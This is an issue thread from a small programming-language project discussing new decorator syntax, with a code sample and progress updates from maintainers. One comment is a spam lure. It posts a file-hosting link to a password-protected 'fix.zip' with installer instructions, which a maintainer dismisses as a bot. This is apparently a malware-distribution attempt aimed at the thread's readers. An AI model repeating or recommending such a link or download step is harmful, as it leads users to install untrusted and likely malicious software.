### ISSUE TITLE
Add decorators

### ISSUE THREAD

**Issue by vintheweirdass** [bulanskrip/lang#2]
This implementation will add decorators like this thing
```ts
import 'bulan:fmt' to fmt
@description Say hello to anyone
@since "1.0.0"
@readonly
pub fn void hello(){
fmt.print("Hello world!!")
}
```

**Comment by cupglassDEV** [comment]
Done in the `grammar.pest` file. Later for the actual implementation

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by cupglassDEV** [comment]
get out yo fucking bot

**Comment by vintheweirdass** [comment]
Changed in the rewritten parser
